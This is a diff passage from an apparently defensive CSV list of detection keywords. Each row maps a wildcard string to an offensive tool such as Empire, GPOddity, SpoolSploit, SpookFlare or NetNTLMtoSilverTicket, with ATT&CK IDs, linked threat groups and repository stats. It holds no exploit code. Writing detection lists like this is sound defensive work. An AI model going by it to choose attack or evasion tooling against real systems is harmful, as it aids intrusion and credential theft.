post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferHostsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferIP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferIPsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferIPsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferLearningDelay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferLearningInterval*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferRepeat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*SpooferHostsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferHostsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIPsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIPsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferLearningDelay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferLearningInterval*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferRepeat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*Spoofy/spoofy.py*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*SpookFlare*","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","10","925","201","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z" "*spookflare.py*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*spool_sploit.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*spooler_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*spooler_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*SpoolSample.exe * *","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*SpoolSample_v4.5_x64.exe*","offensive_tool_keyword","exegol","Fully featured 